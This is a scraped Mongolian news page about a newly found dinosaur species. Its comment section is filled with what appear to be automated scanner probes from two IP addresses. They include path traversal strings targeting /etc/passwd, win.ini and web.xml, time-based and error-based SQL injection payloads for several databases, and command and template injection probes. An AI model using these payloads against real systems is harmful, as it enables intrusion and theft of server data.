Монголоос шинэ төрөл зүйлийн махчин үлэг гүрвэлийн үлдэгдэл олджээ

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-06 19:20:44
Холбоотой мэдээ
Сэтгэгдлүүд
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',9)='u 185.234.72.114 284 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)='y 185.234.72.114 284 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 284 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:9 185.234.72.114 284 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 284 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 284 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(9))::text>'0 185.234.72.114 284 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 284 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 284 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 284 өдөр

  123456
 • admin"and(select*from(select+sleep(9))a/**/union/**/select+1)=" 185.234.72.114 284 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 284 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 284 өдөр

  123456
 • admin'and(select*from(select+sleep(9))a/**/union/**/select+1)=' 185.234.72.114 284 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 284 өдөр

  123456
 • admin'"\( 185.234.72.114 284 өдөр

  123456
 • admin"and"u"="x 185.234.72.114 284 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 284 өдөр

  123456
 • admin"and"x"="x 185.234.72.114 284 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1806595301')))>'0 185.234.72.114 284 өдөр

  123456
 • admin'and'a'='m 185.234.72.114 284 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1400908574'))) 185.234.72.114 284 өдөр

  123456
 • admin'and'o'='o 185.234.72.114 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 284 өдөр

  123456
 • admin/**/and/**/cast(md5('1092504336')as/**/int)>0 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',9)='d
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 284 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1496759542)as/**/int))>'0 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',0)='n
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 284 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1829210673))) 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('y',9)
 • admin"and/**/extractvalue(1,concat(char(126),md5(1562064052)))and" 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('s',0)
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 284 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1372961024)))and' 185.234.72.114 284 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'"\(
 • admin 185.234.72.114 284 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:9
 • admin 185.234.72.114 284 өдөр

  123456鎈'"\(
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 284 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1391533313')))>'0
 • admin 185.234.72.114 284 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:9'/**/
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1169717838')))
 • admin 185.234.72.114 284 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456/**/and/**/cast(md5('1878265035')as/**/int)>0
 • admin 185.234.72.114 284 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(9))::text>'0
 • admin 185.234.72.114 284 өдөр

  123456'and(select'1'from/**/cast(md5(1488820356)as/**/int))>'0
 • admin 185.234.72.114 284 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 284 өдөр

  extractvalue(1,concat(char(126),md5(1747167980)))
 • admin 185.234.72.114 284 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(9))>0/**/
 • admin 185.234.72.114 284 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 284 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1825849366)))and"
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 284 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456"and(select*from(select+sleep(9))a/**/union/**/select+1)="
 • admin 185.234.72.114 284 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1303549980)))and'
 • admin 185.234.72.114 284 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 284 өдөр

  123456'and(select*from(select+sleep(9))a/**/union/**/select+1)='
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 284 өдөр

  (select*from(select+sleep(9)union/**/select+1)a)
 • expr 997658070 + 868067812 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  #set($c=833474069+809431241)${c}$c
 • %u2215etc%u2215passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • %2fetc%2fpasswd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • admin&set /A 947501164+847625577 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 284 өдөр

  123456
 • admin$(expr 922444650 + 835234957) 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456"and"u"="u
 • /etc/passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456"and"s"="s
 • admin|expr 961845558 + 811287663 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  ${(979507234+957930140)?c}
 • admin 185.234.72.114 284 өдөр

  ${826867433+843202760}
 • admin 185.234.72.114 284 өдөр

  /*1*/{{859917558+807206785}}
 • admin expr 833288128 + 974250474 185.234.72.114 284 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and'l'='n
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and'e'='e
 • ./../../../../../../etc/passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456/**/and+3=7
 • admin 185.234.72.114 284 өдөр

  hdoqectonhwefqscefav
 • admin 185.234.72.114 284 өдөр

  expr 990468359 + 989161049
 • ../../../../../../etc/passwdadmin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456/**/and+4=4
 • '-var_dump(md5(153960602))-' 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456&set /A 853066076+888455326
 • ../../../../../../etc/passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456$(expr 821506782 + 953209939)
 • <%- 844744393+847874375 %> 185.234.72.114 284 өдөр

  123456
 • ${@var_dump(md5(609010340))}; 185.234.72.114 284 өдөр

  123456
 • #set($c=850890654+901252905)${c}$c 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • ${817059978+818167896} 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456|expr 981804284 + 888928583
 • admin 185.234.72.114 284 өдөр

  123456 expr 856580023 + 869649984
 • hdoqectonhwefqscefav 185.234.72.114 284 өдөр

  123456
 • ${(892782939+861035571)?c} 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  '-var_dump(md5(520196118))-'
 • admin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  ${868447267+866917553}
 • admin 185.234.72.114 284 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 284 өдөр

  123456
 • ${819890814+844923985} 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  ${@var_dump(md5(307786171))};
 • admin 185.234.72.114 284 өдөр

  123456
 • /*1*/{{838617789+995255490}} 185.234.72.114 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',17)='y 194.163.191.42 284 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a 194.163.191.42 284 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:17 194.163.191.42 284 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 284 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(17))::text>'0 194.163.191.42 284 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 284 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • admin"and(select*from(select+sleep(17))a/**/union/**/select+1)=" 194.163.191.42 284 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 284 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 284 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 284 өдөр

  123456
 • admin'"\( 194.163.191.42 284 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 284 өдөр

  123456
 • admin'and(select*from(select+sleep(17))a/**/union/**/select+1)=' 194.163.191.42 284 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 284 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 284 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 284 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 284 өдөр

  123456
 • admin"and"s"="u 194.163.191.42 284 өдөр

  123456
 • admin"and"u"="u 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(17))>0/**/
 • admin'and'q'='u 194.163.191.42 284 өдөр

  123456
 • admin'and'i'='i 194.163.191.42 284 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1808245989')))>'0 194.163.191.42 284 өдөр

  123456
 • admin/**/and/**/cast(md5('1512565791')as/**/int)>0 194.163.191.42 284 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1738401148'))) 194.163.191.42 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456"and(select*from(select+sleep(17))a/**/union/**/select+1)="
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 284 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1799972489)as/**/int))>'0 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • extractvalue(1,concat(char(126),md5(1284847425))) 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'and(select*from(select+sleep(17))a/**/union/**/select+1)='
 • admin"and/**/extractvalue(1,concat(char(126),md5(1870515040)))and" 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin'and/**/extractvalue(1,concat(char(126),md5(1383585406)))and' 194.163.191.42 284 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  (select*from(select+sleep(17)union/**/select+1)a)
 • admin 194.163.191.42 284 өдөр

  123456'"\(
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 284 өдөр

  123456"and"v"="f
 • admin 194.163.191.42 284 өдөр

  123456鎈'"\(
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456"and"f"="f
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1260450103')))>'0
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1695890153')))
 • admin 194.163.191.42 284 өдөр

  123456'and'i'='s
 • admin 194.163.191.42 284 өдөр

  123456/**/and/**/cast(md5('1075349274')as/**/int)>0
 • admin 194.163.191.42 284 өдөр

  123456'and'c'='c
 • admin 194.163.191.42 284 өдөр

  123456'and(select'1'from/**/cast(md5(1513368662)as/**/int))>'0
 • admin 194.163.191.42 284 өдөр

  extractvalue(1,concat(char(126),md5(1687933748)))
 • admin 194.163.191.42 284 өдөр

  123456/**/and+0=7
 • admin 194.163.191.42 284 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1643662148)))and"
 • admin 194.163.191.42 284 өдөр

  123456/**/and+1=1
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 284 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1033592867)))and'
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 284 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 284 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 284 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 284 өдөр

  123456
 • /etc/passwd 194.163.191.42 284 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 284 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 284 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 284 өдөр

  123456
 • admin$(expr 942483472 + 813506868) 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  ${@var_dump(md5(845803874))};
 • ${950009902+969160369} 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  ${953789475+934971275}
 • admin 194.163.191.42 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • rkjjdofcidxdkdikijkt 194.163.191.42 284 өдөр

  123456
 • admin|expr 912892455 + 937420610 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  rkjjdofcidxdkdikijkt
 • admin expr 934778057 + 817365932 194.163.191.42 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456